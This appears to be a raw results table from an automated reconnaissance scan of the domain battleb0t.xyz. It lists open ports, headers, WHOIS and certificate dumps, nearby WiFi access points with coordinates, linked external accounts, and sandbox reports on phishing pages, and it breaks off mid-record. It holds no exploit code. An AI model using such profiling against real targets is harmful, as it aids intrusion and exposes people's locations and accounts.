73:d4:39:8b:bb:51:02:17:cb:89:c6:27:d9:b8:f2:7c:d7:bd:
a5:b5:9a:11
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | oconnell (Net ID: 00:02:2D:2F:3E:1F) | 34.0544, -118.244 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:443 | 188.114.97.0/24 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.196): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:51 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06G1NS24K8856E7B6C2JF02"], "Server": ["Netlify"]} | 34.74.170.74 |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com | Domain Name: CLOUDWAYSAPPS.COM
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-09-12T18:44:13Z
Creation Date: 2012-01-04T12:17:34Z
Registry Expiry Date: 2028-01-04T12:17:34Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-2016.AWSDNS-60.CO.UK
Name Server: NS-222.AWSDNS-27.COM
Name Server: NS-854.AWSDNS-42.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: cloudwaysapps.com
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-06-22T11:27:03.11Z
Creation Date: 2012-01-04T12:17:34.00Z
Registrar Registration Expiration Date: 2028-01-04T12:17:34.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Name Server: ns-222.awsdns-27.com
Name Server: ns-854.awsdns-42.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-2016.awsdns-60.co.uk
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T06:41:09.59Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:57:23 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:37:42 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Frankfurt Am Main, Germany | 45.131.109.53 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0.github.io | 185.199.111.153 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5b6bb0ea398702-ORD
| 188.114.97.1 |
| 2023-05-12 03:33:50 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | pHYs
iTXtXML:com.adobe.xmp
<xmp:CreatorTool>Adobe ImageReady</xmp:CreatorTool>
<tiff:Orientation>1</tiff:Orientation>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
IDATx
zZrC
"6k!6
JlJQI
5.-q
_ y5b
HBT 7
h_'/o
"6a"B
3fL@rR
6L NR
$6qm.
vc0dj
p<N Q
8aS'_?G
Iz/S.
h'edI
8IRg\
UfnX'c
NjQX00B@
IVcM\
uTYkr
gjwus
HtHCj
q G9$
?J__YQy
USSS`
OBj c
'QOoL
GpyU7
ybe@ ?
QIZVg
O$MMMu
@.X0E
<5!`2E
?bczo
IlH0c
| https://fluid.battleb0t.xyz/gp_badge.png |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2082 | 188.114.97.1 |
| 2023-05-12 02:58:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0c:e3:f4:1c:e8:cb:bb:cf:13:f7:6c:6f:36:5e:c2:eb
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Feb 11 05:22:10 2023 GMT
Not After : May 12 05:22:09 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ce:18:28:ee:1e:4b:a0:54:f5:b2:a8:46:72:fa:
7a:1b:b5:83:d9:b7:b9:85:b6:7e:b8:27:ed:42:bb:
f5:8d:d9:0c:96:a1:ac:39:e8:ba:ac:6a:f9:9f:0d:
46:7d:1d:65:d4:56:4a:89:c7:ac:f3:42:0e:7d:79:
7a:b0:01:1a:1e:df:5a:64:96:92:41:7b:76:b3:71:
65:05:d4:d3:ac:cb:dd:ed:f6:10:2e:3d:94:bc:fe:
b8:5d:9b:af:1f:73:66:41:55:24:91:8f:6a:93:09:
c4:a9:4e:cc:3f:db:83:53:92:be:e5:79:63:d7:c0:
f2:ad:fb:15:4c:da:cf:26:0f:ae:09:13:32:5e:2f:
61:79:df:43:b7:2e:3e:7a:3f:f1:71:51:6a:d0:2c:
51:14:2b:e5:5a:3a:2a:63:a7:80:69:d6:dd:ff:21:
c9:3a:6c:59:b1:94:d7:a0:d6:e0:c5:59:62:0d:45:
33:fc:cc:08:f3:b9:08:a9:ea:24:98:5f:22:3c:5b:
51:7a:ef:2a:db:8c:ca:b6:bd:39:1c:ec:e9:76:19:
54:df:f7:38:11:32:20:7f:02:4a:bb:97:a7:34:fd:
a8:8b:36:ea:36:af:62:53:9d:78:4a:b7:98:3a:a9:
07:8f:74:9e:43:31:08:ab:be:62:c0:5e:01:ec:ce:
53:dd
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
F7:A7:5E:24:2E:1C:7A:7A:2A:90:36:DF:66:18:6B:A7:17:36:7E:3E
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_NaLKSGSIEY
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/fXbrD094iyQ.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:bc:ea:b6:cf:53:d5:18:fa:35:01:f5:1a:84:b4:db:1b:35:
a8:21:d4:b0:1c:8c:61:d9:0a:ed:8a:98:0e:ec:59:d1:7e:8a:
57:4f:81:85:21:9d:81:17:a5:6d:50:b7:02:17:30:3f:51:39:
0f:0d:a8:d9:9c:3b:6f:9f:16:6b:f6:f6:71:30:1e:f6:cd:df:
76:28:c1:38:b4:2a:e8:d2:ce:d8:22:7a:dc:2b:32:d6:cb:47:
88:b5:09:84:fa:12:6c:6e:e0:35:16:bb:24:8c:97:ba:91:7e:
45:50:9e:95:dc:7b:ff:96:e1:f9:37:11:30:5c:89:2e:ed:a5:
42:7f:26:b7:5c:84:0f:5f:e0:da:f9:32:fa:e2:bd:aa:52:51:
70:cd:f0:79:e0:2d:8e:67:56:3c:ba:c2:1e:d9:2f:a6:4b:13:
8c:cf:70:85:8b:05:86:ea:ed:7a:8a:75:c4:87:c4:fc:b8:11:
72:8c:37:b1:f0:08:21:35:fa:6a:0a:a7:28:58:06:2e:4b:74:
11:70:1e:20:5f:d2:60:2c:f6:42:ca:fa:2c:6e:50:27:2a:ea:
bd:8f:2d:c2:66:e4:e3:0c:69:4a:0b:47:18:a2:29:2b:ca:35:
4e:52:e9:78:dd:08:a8:e2:6b:51:5d:78:d4:f2:8b:19:66:55:
d1:aa:21:f5
| ayhu.xyz |
| 2023-05-12 02:44:07 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Varnish | battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | iTrack at Milbank (Net ID: 00:02:2D:2D:57:34) | 34.0544, -118.244 |
| 2023-05-12 02:51:45 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 25, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=a85668108cb3&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:3704:120:WilError_01"\n "SM0:3704:304:WilStaging_02"\n "Local\\SM0:3704:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:3704:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.122:443"\n "142.251.2.157:443"\n "151.101.0.176:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "142.251.46.164:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.2332.240.14325218193887401859"\n "msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.2332.240.5569041425166893211"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2332_1227727462\\shopping.js]- [targetUID: 00000000-00002332]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007076]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir2332_1139505351\\Ruleset Data]- [targetUID: 00000000-00002332]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: 00000000-00002332]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00002332]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\2332_751382652\\Filtering Rules]- [targetUID: 00000000-00002332]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2332_1705320843\\edge_driver.js]- [targetUID: 00000000-00002332]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2332_1227727462\\edge_driver.js]- [targetUID: 00000000-00002332]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\2332_1705320843\\vendor.bundle.js]- [targetUID: 00 | 185.199.108.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | datezone (Category: XXXPORNXXX)
https://www.datezone.com/users/login/ | login |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 165.232.113.85 |
| 2023-05-12 02:54:07 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::/48 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Jacobson1 (Net ID: 00:09:5B:C6:54:54) | 39.0469, -77.4903 |
| 2023-05-12 02:54:51 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29418, United States, North America | 34.74.170.74 |
| 2023-05-12 03:33:50 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | pHYs
tEXtSoftware
ezgif.com
IDATx
owqpphF
\\\`gg
!LHH
EEEF3
HJJBDD
//Oq
bcc1o
mll84
jerrrLl
Q_dv4k
<x _!
8xOOO
322H\\
BHnn.y
vvv$..NI
22QQQr
J2QQQJ
hlOKKS
zuxzz
d @ta
qzmm5
sGQF1
///DDD
.lK!$$D
199Y.
D"""t
kSlll
bDGGc
!HIIQ
\\\PTT
777dgg
q740L$
App0u
U9xgg
ppp@QQ
QTTTF
UItt4
r@8::b
kn3xc
rssCPP
899!""
HO6'\\\
xyyiu
q?WWW
HOOGII
nwwwr
SoII
>_6rss
ZBBB4
_RRB>
8q"qww
Ye<<<
5Cxx8
klOKK
:t@TT
BBB8s
<RRR4
.gggxyy
@`` o
@iF0>2
vzyyq
x\$''
\\\x?.Pz
fRRR0i
kYe6m
ux"33
dgnn.
gggGF
/_"!!
322Lh
- `2
JJJtQM
R'SRR
D"Y?z
5tEXtComment
| https://fluid.battleb0t.xyz/app_badge.png |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | devRant (Category: coding)
https://devrant.com/users/login | login |
| 2023-05-12 02:54:48 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.148.97.127:80 | 34.148.97.127 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.6.166 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MS54GURN (Net ID: 00:0D:3A:70:7B:09) | 39.0469, -77.4903 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00nave198.github.io]
https://www.openphish.com/feed.txt | 00nave198.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 00:02:2D:05:7E:8A (Net ID: 00:02:2D:05:7E:8A) | 37.780462,-122.390564 |
| 2023-05-12 02:45:44 | Physical Coordinates | No | AbstractAPI | 43 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:50c0:8002::153 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery CDN | funny.battleb0t.xyz |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 44 | 0 | 1 | 0 | None | www.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | VIGO (Net ID: 00:01:E3:4A:C7:EB) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:77:9F:5D) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | fse2 (Net ID: 00:01:38:A0:A1:09) | 37.780462,-122.390564 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c564d9c4d65692b-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 7717 7361 (Net ID: 00:00:C5:FC:FE:34) | 37.7813933,-122.3918002 |
| 2023-05-12 02:52:05 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 17, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://hassan-gamall.github.io/netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6760:304:WilStaging_02"\n "SM0:6760:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6760:304:WilStaging_02"\n "Local\\SM0:6760:120:WilError_01"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "urlref_httpshassan-gamall.github.ionetflix")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file 